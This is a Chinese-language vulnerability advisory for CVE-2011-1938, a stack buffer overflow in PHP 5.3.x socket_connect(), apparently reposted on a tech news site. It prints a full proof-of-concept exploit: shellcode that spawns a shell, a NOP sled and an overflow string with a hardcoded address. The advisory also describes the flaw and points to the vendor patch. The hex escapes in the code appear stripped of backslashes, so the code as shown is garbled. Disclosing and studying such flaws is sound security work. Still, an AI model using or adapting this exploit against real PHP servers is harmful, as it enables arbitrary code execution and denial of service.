发布日期:2011-05-24
更新日期:2011-05-25受影响系统:
PHP PHP 5.3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47950
CVE ID: CVE-2011-1938PHP是英文超级文本预处理语言(PHP:Hypertext Preprocessor)的缩写。PHP "socket_connect()"函数在实现上存在栈缓冲区溢出漏洞,远程攻击者可利用此漏洞在执行PHP进程中执行任意机器代码,可能会造成Web服务器的崩溃,拒绝服务合法用户。<*来源:Mateusz Kocielski
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php
echo "[+] CVE-2011-1938";
echo "[+] there we go...
";
define("EVIL_SPACE_ADDR", "xffxffxeexb3");
define("EVIL_SPACE_SIZE", 1024*1024*8);
$SHELLCODE =
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0".
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1".
"xcdx80";
echo "[+] creating the sled.
";$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)
";
$var85 = socket_connect($var79,$b);
?>建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.php.netAdobe Flash Player远程整数溢出漏洞IBM Lotus Notes附件处理多个缓冲区溢出漏洞相关资讯 PHP
- PHP代码规范的10个好习惯 (12/05/2015 08:20:04)
- PHP 性能分析与实验:性能的宏观分 (08/19/2015 19:48:24)
- 在 Linux 命令行中使用和执行 PHP (07/30/2015 10:07:32)
| - PHP 性能分析与实验:性能的微观分 (09/13/2015 20:49:27)
- PHP 和 Node.js 的对决 (08/06/2015 08:51:28)
- 在 Linux 命令行中使用和执行 PHP (07/29/2015 13:15:46)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或
|